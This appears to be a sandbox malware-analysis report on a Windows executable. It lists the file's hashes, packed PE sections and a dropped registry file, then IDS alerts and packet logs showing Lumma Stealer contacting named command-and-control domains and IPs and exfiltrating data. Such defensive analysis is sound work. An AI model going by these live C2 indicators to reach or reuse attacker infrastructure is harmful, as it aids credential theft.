                                                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="643529" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                        File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1835008
                                                                                                                                                                                                                                                                        Entropy (8bit):4.42156368041741
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6144:XSvfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnN30uhiTwJ:CvloTMW+EZMM6DFyh03wJ
                                                                                                                                                                                                                                                                        MD5:D02F413AD6CB6B3768DEF44A35EA4D21
                                                                                                                                                                                                                                                                        SHA1:AE1396459835D7F7B1671FE664A46C92EE3DDB71
                                                                                                                                                                                                                                                                        SHA-256:0900DB5F3A48E7E66A03747E9F6D33F5297B39153B62539C13962B7C3C264684
                                                                                                                                                                                                                                                                        SHA-512:ED8D9BFC2092309B3D96E13118D3F4DE36A0F2C5EF6750A1FEB7EF9B90C710E50708D289723CD5F7F8212FAA176D25E62DFE6DACEE4D0B5099F0D99193EE557E
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmv*...U........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Entropy (8bit):6.536442547821044
                                                                                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                        File name:TmmiCE5Ulm.exe
                                                                                                                                                                                                                                                                        File size:2'934'784 bytes
                                                                                                                                                                                                                                                                        MD5:39a156657be03cc94d69874b25836b8c
                                                                                                                                                                                                                                                                        SHA1:c23e004baca2916e986c556974abaab7783bdba7
                                                                                                                                                                                                                                                                        SHA256:5bfd8db573ebaf03ceffdbe9a0b94a69574930222253a4de5ad02e2e735c9041
                                                                                                                                                                                                                                                                        SHA512:74b7a752f8edeffaa3ebadcdca0bc9f19b0939c57c12ee35eba732f39523f5bbfddd77400cc41dbf4053c4a78b4af944bfebd24554e730b8d5c5d35c5132c0b9
                                                                                                                                                                                                                                                                        SSDEEP:49152:+YqM+KnpELKiYc/ybP7+Jgq2bmOHA2K7WOJSb:P6KpELKiY0GP7+H2bjVK7WS
                                                                                                                                                                                                                                                                        TLSH:40D53A72A51872CBF49E1774D4A7CD83A95C43F98B2408E3986DB4BBBD63DC411B9C28
                                                                                                                                                                                                                                                                        File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....<_g............................../...........@.........................../.......,...@.................................T0..h..
                                                                                                                                                                                                                                                                        Icon Hash:00928e8e8686b000
                                                                                                                                                                                                                                                                        Entrypoint:0x6fa000
                                                                                                                                                                                                                                                                        Entrypoint Section:.taggant
                                                                                                                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                        Time Stamp:0x675F3CD1 [Sun Dec 15 20:32:17 2024 UTC]
                                                                                                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                                                                                                        OS Version Major:6
                                                                                                                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                                                                                                                        File Version Major:6
                                                                                                                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                                                                                                                        Subsystem Version Major:6
                                                                                                                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                                                                                                                        Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                                                                                                                                                                                                        Instruction
                                                                                                                                                                                                                                                                        jmp 00007F05F0C28F3Ah
                                                                                                                                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x530540x68.idata
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x531f80x8.idata
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                                        0x10000x510000x248002eff7a0b93394bba3d25a72b6a474ae2False0.997431506849315OpenPGP Secret Key7.98239541875244IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                        .rsrc 0x520000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                        .idata 0x530000x10000x20019a29171433eeef17e42fd663f137134False0.14453125data0.9996515881509258IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                        wlptngjz0x540000x2a50000x2a48001de4b53a0f734adaf4886bdb71d555e9unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                        nuxtdfjk0x2f90000x10000x400b9daadeeb83a113323ac84c444659910False0.763671875data6.022715468590857IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                        .taggant0x2fa0000x30000x22007a2e34955733d2dbaa101df1b1ccab83False0.08880974264705882DOS executable (COM)1.0534260924731311IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                        DLLImport
                                                                                                                                                                                                                                                                        kernel32.dlllstrcpy
                                                                                                                                                                                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                                        2024-12-23T07:26:19.826811+01002058378ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat)1192.168.2.5576581.1.1.153UDP
                                                                                                                                                                                                                                                                        2024-12-23T07:26:19.969987+01002058364ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat)1192.168.2.5534831.1.1.153UDP
                                                                                                                                                                                                                                                                        2024-12-23T07:26:20.251882+01002058360ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat)1192.168.2.5533001.1.1.153UDP
                                                                                                                                                                                                                                                                        2024-12-23T07:26:20.422354+01002058370ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacebudi .lat)1192.168.2.5565331.1.1.153UDP
                                                                                                                                                                                                                                                                        2024-12-23T07:26:20.575002+01002058362ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (energyaffai .lat)1192.168.2.5574871.1.1.153UDP
                                                                                                                                                                                                                                                                        2024-12-23T07:26:20.737542+01002058354ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (aspecteirs .lat)1192.168.2.5519721.1.1.153UDP
                                                                                                                                                                                                                                                                        2024-12-23T07:26:20.908101+01002058376ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sustainskelet .lat)1192.168.2.5620631.1.1.153UDP
                                                                                                                                                                                                                                                                        2024-12-23T07:26:21.049421+01002058358ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crosshuaht .lat)1192.168.2.5595071.1.1.153UDP
                                                                                                                                                                                                                                                                        2024-12-23T07:26:21.191727+01002058374ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rapeflowwj .lat)1192.168.2.5564881.1.1.153UDP
                                                                                                                                                                                                                                                                        2024-12-23T07:26:22.907787+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.54970423.55.153.106443TCP
                                                                                                                                                                                                                                                                        2024-12-23T07:26:23.688885+01002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.54970423.55.153.106443TCP
                                                                                                                                                                                                                                                                        2024-12-23T07:26:25.273559+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549705104.21.66.86443TCP
                                                                                                                                                                                                                                                                        2024-12-23T07:26:26.025898+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549705104.21.66.86443TCP
                                                                                                                                                                                                                                                                        2024-12-23T07:26:26.025898+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549705104.21.66.86443TCP
                                                                                                                                                                                                                                                                        2024-12-23T07:26:27.523188+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549706104.21.66.86443TCP
                                                                                                                                                                                                                                                                        2024-12-23T07:26:28.306228+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.549706104.21.66.86443TCP
                                                                                                                                                                                                                                                                        2024-12-23T07:26:28.306228+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549706104.21.66.86443TCP
                                                                                                                                                                                                                                                                        2024-12-23T07:26:30.005399+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549707104.21.66.86443TCP
                                                                                                                                                                                                                                                                        2024-12-23T07:26:32.418082+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549708104.21.66.86443TCP
                                                                                                                                                                                                                                                                        2024-12-23T07:26:34.851601+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549709104.21.66.86443TCP
                                                                                                                                                                                                                                                                        2024-12-23T07:26:37.433944+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549713104.21.66.86443TCP
                                                                                                                                                                                                                                                                        2024-12-23T07:26:38.213154+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.549713104.21.66.86443TCP
                                                                                                                                                                                                                                                                        2024-12-23T07:26:39.946896+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549716104.21.66.86443TCP
                                                                                                                                                                                                                                                                        2024-12-23T07:26:39.957213+01002843864ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M21192.168.2.549716104.21.66.86443TCP
                                                                                                                                                                                                                                                                        2024-12-23T07:26:45.605600+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549733104.21.66.86443TCP
                                                                                                                                                                                                                                                                        2024-12-23T07:26:46.388182+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549733104.21.66.86443TCP
                                                                                                                                                                                                                                                                        2024-12-23T07:26:48.168779+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549739185.166.143.49443TCP
                                                                                                                                                                                                                                                                        2024-12-23T07:26:50.605999+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.5497453.5.16.86443TCP
                                                                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:21.505074024 CET49704443192.168.2.523.55.153.106
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:21.505122900 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:21.505211115 CET49704443192.168.2.523.55.153.106
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:21.506510019 CET49704443192.168.2.523.55.153.106
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:21.506539106 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:22.907675982 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:22.907787085 CET49704443192.168.2.523.55.153.106
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:22.912303925 CET49704443192.168.2.523.55.153.106
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:22.912328005 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:22.912682056 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:22.959949970 CET49704443192.168.2.523.55.153.106
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:23.007323980 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:23.688812971 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:23.688838005 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:23.688879967 CET49704443192.168.2.523.55.153.106
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:23.688882113 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:23.688900948 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:23.688918114 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:23.688931942 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:23.688946962 CET49704443192.168.2.523.55.153.106
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:23.688946962 CET49704443192.168.2.523.55.153.106
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:23.688962936 CET49704443192.168.2.523.55.153.106
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:23.866249084 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:23.866306067 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:23.866442919 CET49704443192.168.2.523.55.153.106
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:23.866471052 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:23.866519928 CET49704443192.168.2.523.55.153.106
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:23.896437883 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:23.896486044 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:23.896528006 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:23.896543980 CET49704443192.168.2.523.55.153.106
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:23.896584034 CET49704443192.168.2.523.55.153.106
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:23.898046017 CET49704443192.168.2.523.55.153.106
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:23.898073912 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:23.898091078 CET49704443192.168.2.523.55.153.106
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:23.898097992 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:24.057008028 CET49705443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:24.057051897 CET44349705104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:24.057157040 CET49705443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:24.057555914 CET49705443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:24.057569981 CET44349705104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:25.273384094 CET44349705104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:25.273559093 CET49705443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:25.276407003 CET49705443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:25.276422024 CET44349705104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:25.276650906 CET44349705104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:25.277901888 CET49705443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:25.277982950 CET49705443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:25.279468060 CET44349705104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:26.025974989 CET44349705104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:26.026212931 CET44349705104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:26.026304007 CET49705443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:26.236821890 CET49705443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:26.236866951 CET44349705104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:26.236881971 CET49705443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:26.236887932 CET44349705104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:26.308549881 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:26.308604956 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:26.308674097 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:26.309041023 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:26.309050083 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:27.523089886 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:27.523188114 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:27.524512053 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:27.524525881 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:27.524861097 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:27.526405096 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:27.526446104 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:27.526492119 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:28.306233883 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:28.306305885 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:28.306325912 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:28.306427002 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:28.306472063 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:28.306516886 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:28.306629896 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:28.313625097 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:28.313663960 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:28.313700914 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:28.313740015 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:28.313781977 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:28.320904016 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:28.329166889 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:28.329246998 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:28.329253912 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:28.329279900 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:28.329322100 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:28.425807953 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:28.430443048 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:28.430546045 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:28.430599928 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:28.481776953 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:28.498311996 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:28.502336025 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:28.502424002 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:28.502432108 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:28.502463102 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:28.502515078 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:28.502630949 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:28.502796888 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:28.502804995 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:28.502816916 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:28.502851963 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:28.783937931 CET49707443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:28.783983946 CET44349707104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:28.784064054 CET49707443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:28.784392118 CET49707443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:28.784404993 CET44349707104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:30.005189896 CET44349707104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:30.005398989 CET49707443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:30.006711960 CET49707443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:30.006721973 CET44349707104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:30.007009983 CET44349707104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:30.008263111 CET49707443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:30.008456945 CET49707443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:30.008485079 CET44349707104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:31.061589956 CET44349707104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:31.061697006 CET44349707104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:31.061753988 CET49707443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:31.061835051 CET49707443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:31.061853886 CET44349707104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:31.206490993 CET49708443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:31.206527948 CET44349708104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:31.206620932 CET49708443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:31.206933022 CET49708443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:31.206952095 CET44349708104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:32.417979956 CET44349708104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:32.418081999 CET49708443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:32.420639038 CET49708443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:32.420656919 CET44349708104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:32.420891047 CET44349708104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:32.421999931 CET49708443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:32.422163963 CET49708443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:32.422183990 CET44349708104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:32.422230005 CET49708443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                                        Dec 23, 2024 07:26:32.422235966 CET44349708104.21.66.86192.168.2.5
